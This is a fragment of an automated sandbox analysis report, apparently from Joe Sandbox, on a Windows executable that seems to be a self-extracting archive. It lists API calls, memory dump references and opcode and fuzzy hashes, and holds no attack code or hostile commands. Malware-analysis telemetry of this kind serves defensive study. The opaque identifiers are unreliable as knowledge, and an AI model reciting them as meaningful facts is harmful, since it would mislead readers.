• Instruction Fuzzy Hash: 451133B1581B24BAE520B7B1EC0BFCF7BAC9F84B00F508C15B29D660E6DA75B5098B50
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0091E669,0091E5CC,0091E86D), ref: 0091E605
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0091E61B
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0091E630
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                  • API String ID: 667068680-1718035505
                                                                                                  • Opcode ID: 01dd19e35c685e15a15d2b8477c8b01802a544d14ade662547a367fcb65706ba
                                                                                                  • Instruction ID: 1695366888b60e7969f04a5606bafd1eb164810d6be2f5edfe998a28a2a521ae
                                                                                                  • Opcode Fuzzy Hash: 01dd19e35c685e15a15d2b8477c8b01802a544d14ade662547a367fcb65706ba
                                                                                                  • Instruction Fuzzy Hash: 0CF02B317952269B8F214F745C889EE22CD6E697C5385443DED46D3110EB58CCD0BF90
                                                                                                  APIs
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 009114C2
                                                                                                    • Part of subcall function 0090B146: GetVersionExW.KERNEL32(?), ref: 0090B16B
                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009114E6
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00911500
                                                                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00911513
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00911523
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00911533
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                  • String ID:
                                                                                                  • API String ID: 2092733347-0
                                                                                                  • Opcode ID: 54cab33aee53f46a65611ab1bb7b8c034a9511dc229a4bf86e93f32cceab18a5
                                                                                                  • Instruction ID: 8ad2a8198b731b6ea93d261816d70dc9fa9b194771fcd0d52036dff609b345b4
                                                                                                  • Opcode Fuzzy Hash: 54cab33aee53f46a65611ab1bb7b8c034a9511dc229a4bf86e93f32cceab18a5
                                                                                                  • Instruction Fuzzy Hash: CC31D775118346ABC704DFA8C88499BB7E8BF98714F008A1EF995C3210E734D549CBA6
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,00922AF1,009202FC,0091FA34), ref: 00922B08
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00922B16
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00922B2F
                                                                                                  • SetLastError.KERNEL32(00000000,00922AF1,009202FC,0091FA34), ref: 00922B81
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: 18f4fbc5f4ecca807f344db9e534a70a4cd4e2ff56955c060d147d595caf628f
                                                                                                  • Instruction ID: 92fec404ad3c7eceba38ed24f76afa879afb8e6948c2a64c268083ffb92061ba
                                                                                                  • Opcode Fuzzy Hash: 18f4fbc5f4ecca807f344db9e534a70a4cd4e2ff56955c060d147d595caf628f
                                                                                                  • Instruction Fuzzy Hash: 8F01F23266E3327EAA242B757C89B2B2B5DEF92B74B70473AF510550E8EF154D00AA44
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,00941030,00924674,00941030,?,?,00923F73,00000050,?,00941030,00000200), ref: 009297E9
                                                                                                  • _free.LIBCMT ref: 0092981C
                                                                                                  • _free.LIBCMT ref: 00929844
                                                                                                  • SetLastError.KERNEL32(00000000,?,00941030,00000200), ref: 00929851
                                                                                                  • SetLastError.KERNEL32(00000000,?,00941030,00000200), ref: 0092985D
                                                                                                  • _abort.LIBCMT ref: 00929863
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 3160817290-0
                                                                                                  • Opcode ID: 9e230a3e97bdf2ce2ed441f51d3a0623fb12506d3ef4d509eb0d7d180ec9fe6a
                                                                                                  • Instruction ID: 52ba6d069ce79f1e3f88317ceaa366e5ac754ff7b9a5a3b06d38322b60ac0cc5
                                                                                                  • Opcode Fuzzy Hash: 9e230a3e97bdf2ce2ed441f51d3a0623fb12506d3ef4d509eb0d7d180ec9fe6a
                                                                                                  • Instruction Fuzzy Hash: 8AF0283614863167C7123334BC0AB1B1A69DFD2770F290024F614961DEEE34880A5925
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0091DC47
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0091DC61
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0091DC72
                                                                                                  • TranslateMessage.USER32(?), ref: 0091DC7C
                                                                                                  • DispatchMessageW.USER32(?), ref: 0091DC86
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0091DC91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                  • String ID:
                                                                                                  • API String ID: 2148572870-0
                                                                                                  • Opcode ID: d98189b7ddc9adcb8e9c8934288c3215fd6f169eccfd59fe9afe7ad49ad2f00b
                                                                                                  • Instruction ID: 1b83abb090edfb47d81c9f859d04ed138663634a2b0174419adbc99793a65a1e
                                                                                                  • Opcode Fuzzy Hash: d98189b7ddc9adcb8e9c8934288c3215fd6f169eccfd59fe9afe7ad49ad2f00b
                                                                                                  • Instruction Fuzzy Hash: DFF03C72B05219BBCB206BA5DD4CDCB7F6DEF42791B008411F50AD2050D675868ADBE0
                                                                                                  APIs
                                                                                                    • Part of subcall function 009105DA: _wcslen.LIBCMT ref: 009105E0
                                                                                                    • Part of subcall function 0090B92D: _wcsrchr.LIBVCRUNTIME ref: 0090B944
                                                                                                  • _wcslen.LIBCMT ref: 0090C197
                                                                                                  • _wcslen.LIBCMT ref: 0090C1DF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$_wcsrchr
                                                                                                  • String ID: .exe$.rar$.sfx
                                                                                                  • API String ID: 3513545583-31770016
                                                                                                  • Opcode ID: e693f18cf79c762d2dde300d7c6d2bc4fb023a64fb12dde562cee27a7554ece0
                                                                                                  • Instruction ID: 04defec1ca34ce5c91ecd3c2816710e0525351cf6f328e4f8561f51bf8ce36f6
                                                                                                  • Opcode Fuzzy Hash: e693f18cf79c762d2dde300d7c6d2bc4fb023a64fb12dde562cee27a7554ece0
                                                                                                  • Instruction Fuzzy Hash: E9411561544315EECB31AF648842B7A73B8EF80744F104A0EF9916B5C1EB658DC2C391
                                                                                                  APIs
                                                                                                  • GetTempPathW.KERNEL32(00000800,?), ref: 0091CE9D
                                                                                                    • Part of subcall function 0090B690: _wcslen.LIBCMT ref: 0090B696
                                                                                                  • _swprintf.LIBCMT ref: 0091CED1
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                  • SetDlgItemTextW.USER32(?,00000066,0094946A), ref: 0091CEF1
                                                                                                  • EndDialog.USER32(?,00000001), ref: 0091CFFE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                  • String ID: %s%s%u
                                                                                                  • API String ID: 110358324-1360425832
                                                                                                  • Opcode ID: 97f3a9baec5c63aa1362e700d27b71b9cf0810a1210da786715dee8bc2ad994f
                                                                                                  • Instruction ID: 3ff2bba907e6de2f814a84139aaa2554e4d7c7861b7381d3993ea09da66abb5c
                                                                                                  • Opcode Fuzzy Hash: 97f3a9baec5c63aa1362e700d27b71b9cf0810a1210da786715dee8bc2ad994f
                                                                                                  • Instruction Fuzzy Hash: DA41A0B1A4061CAADF209B90CC41FEE77BCEB45344F4080A6FA09E7191EB758E85DF61
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 0090BB27
                                                                                                  • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0090A275,?,?,00000800,?,0090A23A,?,0090755C), ref: 0090BBC5
                                                                                                  • _wcslen.LIBCMT ref: 0090BC3B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$CurrentDirectory
                                                                                                  • String ID: UNC$\\?\
                                                                                                  • API String ID: 3341907918-253988292
                                                                                                  • Opcode ID: f08a8bc9e9b8448b5372da9446c7b3415753fbfa5b424dd11f9b7ae570c357a5
                                                                                                  • Instruction ID: e5414c07bfd95badf1e3bf4c96f28f28bcf2448d35dd4a09079852d9d09feb28
                                                                                                  • Opcode Fuzzy Hash: f08a8bc9e9b8448b5372da9446c7b3415753fbfa5b424dd11f9b7ae570c357a5
                                                                                                  • Instruction Fuzzy Hash: 4341B43254022AAEEF21AF24CC01FEA77ADAF81390F108565F894A3191DBB5DED08B50
                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\hz7DzW2Yop.exe,00000104), ref: 00927FAE
                                                                                                  • _free.LIBCMT ref: 00928079
                                                                                                  • _free.LIBCMT ref: 00928083
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$FileModuleName
                                                                                                  • String ID: C:\Users\user\Desktop\hz7DzW2Yop.exe$`%t
                                                                                                  • API String ID: 2506810119-2735165847
                                                                                                  • Opcode ID: 7181e377e33efc890eee826acc383410daff759af31ebed83362214deb41eef3
                                                                                                  • Instruction ID: 51c3aa9d553fefa48d891dfb3311317a52109556aa97ac09c87aaea022fe474c
                                                                                                  • Opcode Fuzzy Hash: 7181e377e33efc890eee826acc383410daff759af31ebed83362214deb41eef3
                                                                                                  • Instruction Fuzzy Hash: F231C271A49228AFDB21DF95E880ADFBBFCEF85310F10406AF804A7215DB718E44CB91
                                                                                                  APIs
                                                                                                  • LoadBitmapW.USER32(00000065), ref: 0091B6ED
                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0091B712
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0091B744
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0091B767
                                                                                                    • Part of subcall function 0091A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0091B73D,00000066), ref: 0091A6D5
                                                                                                    • Part of subcall function 0091A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0091B73D,00000066), ref: 0091A6EC
                                                                                                    • Part of subcall function 0091A6C2: LoadResource.KERNEL32(00000000,?,?,?,0091B73D,00000066), ref: 0091A703
                                                                                                    • Part of subcall function 0091A6C2: LockResource.KERNEL32(00000000,?,?,?,0091B73D,00000066), ref: 0091A712
                                                                                                    • Part of subcall function 0091A6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0091B73D,00000066), ref: 0091A72D
                                                                                                    • Part of subcall function 0091A6C2: GlobalLock.KERNEL32(00000000), ref: 0091A73E
                                                                                                    • Part of subcall function 0091A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0091A762
                                                                                                    • Part of subcall function 0091A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0091A7A7
                                                                                                    • Part of subcall function 0091A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0091A7C6
                                                                                                    • Part of subcall function 0091A6C2: GlobalFree.KERNEL32(00000000), ref: 0091A7CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                  • String ID: ]
                                                                                                  • API String ID: 1797374341-3352871620
                                                                                                  • Opcode ID: 20d7163f5bbdd4008efdfc9f44b72211b67f689054a92dde18da4962521ae95b
                                                                                                  • Instruction ID: 9122c4670d72a833b307a876ac9d56a6e958f1577af6288e7aa7264c4edef62f
                                                                                                  • Opcode Fuzzy Hash: 20d7163f5bbdd4008efdfc9f44b72211b67f689054a92dde18da4962521ae95b
                                                                                                  • Instruction Fuzzy Hash: 7401D236B4120967C7127B749D09BFF7ABE9FC1BA2F080014F910A7295DF758D8952A1
                                                                                                  APIs
                                                                                                    • Part of subcall function 00901316: GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                    • Part of subcall function 00901316: SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  • EndDialog.USER32(?,00000001), ref: 0091D64B
                                                                                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0091D661
                                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0091D675
                                                                                                  • SetDlgItemTextW.USER32(?,00000068), ref: 0091D684
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemText$DialogWindow
                                                                                                  • String ID: RENAMEDLG
                                                                                                  • API String ID: 445417207-3299779563
                                                                                                  • Opcode ID: ee6f4f158bae6cf2bc658f6382105f6895bdc89e73d188379ae826732d2b8540
                                                                                                  • Instruction ID: f3ca84a47a0ed359334510917c2d52c42da0bbe4719f0d8d478e2a6bca8f61af
                                                                                                  • Opcode Fuzzy Hash: ee6f4f158bae6cf2bc658f6382105f6895bdc89e73d188379ae826732d2b8540
                                                                                                  • Instruction Fuzzy Hash: F0014C3335E318BBD2114F649D09F9B775CEB9BB82F014414F345A20D0C7E29A48AB75
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00927E24,00000000,?,00927DC4,00000000,0093C300,0000000C,00927F1B,00000000,00000002), ref: 00927E93
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00927EA6
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00927E24,00000000,?,00927DC4,00000000,0093C300,0000000C,00927F1B,00000000,00000002), ref: 00927EC9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: bc92fa935606c5ebcb3150735e36d329a166c45806dfc2b5b9592f93f588e8ad
                                                                                                  • Instruction ID: bea65607c88fd9fad57e2f3d8d6ac012ebc275b24f64c92fae88c56b42d295ac
                                                                                                  • Opcode Fuzzy Hash: bc92fa935606c5ebcb3150735e36d329a166c45806dfc2b5b9592f93f588e8ad
                                                                                                  • Instruction Fuzzy Hash: ABF06831A54218BBCB159FA4DC09B9EFFB9EF44715F0181A9F805A2270DB349E40DEA1
                                                                                                  APIs
                                                                                                    • Part of subcall function 0091081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00910836
                                                                                                    • Part of subcall function 0091081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0090F2D8,Crypt32.dll,00000000,0090F35C,?,?,0090F33E,?,?,?), ref: 00910858
                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0090F2E4
                                                                                                  • GetProcAddress.KERNEL32(009481C8,CryptUnprotectMemory), ref: 0090F2F4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                  • API String ID: 2141747552-1753850145
                                                                                                  • Opcode ID: adad1c31a1ba6dbc943793cac93960888d343e519883b8b978a382cb78f2b83f
                                                                                                  • Instruction ID: d15557da43c528dc84f9e6b343514d42dec600ffa75758ce6538192a02d07af9
                                                                                                  • Opcode Fuzzy Hash: adad1c31a1ba6dbc943793cac93960888d343e519883b8b978a382cb78f2b83f
                                                                                                  • Instruction Fuzzy Hash: 70E026309A47019ECB309F38980CB017AD86F44704F00C86DF0DAD3690C6B9D1808F00
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustPointer$_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 2252061734-0
